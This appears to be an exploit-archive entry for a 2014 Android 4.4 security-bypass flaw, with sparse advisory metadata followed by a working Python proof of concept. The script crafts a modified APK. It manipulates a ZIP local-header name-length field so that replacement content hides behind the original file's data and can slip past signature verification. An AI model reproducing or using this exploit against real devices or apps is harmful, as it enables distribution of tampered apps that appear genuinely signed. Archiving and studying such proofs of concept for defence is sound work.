Google Android Security-Bypass Vulnerability

vendor:

Android

by:

SecurityFocus

7,8

CVSS

HIGH

Security-Bypass

287

CWE

Product Name: Android

Affected Version From: Android 4.4

Affected Version To: Android 4.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Google Android Security-Bypass Vulnerability

Google Android is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.

Mitigation:

N/A

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63547/info

Google Android is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.

Android 4.4 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import zipfile
import struct
import sys

# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()

fp = zout.fp

for name in zin.namelist():
    old = zin.read(name)
    if name != replace:
        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
    else:
        assert len(new) <= len(old)

        # write header, old data, and record offset
        zout.writestr(name, old, zipfile.ZIP_STORED)
        offset = fp.tell()

        # return to name length, set to skip old data
        fp.seek(-len(old) -len(name) -4, 1)
        fp.write(struct.pack('<h', len(name) + len(old)))

        # after old data, write new data \0 padded
        fp.seek(offset)
        fp.write(new)
        fp.write('\0' * (len(old) - len(new)))

zout.close()
zin.close()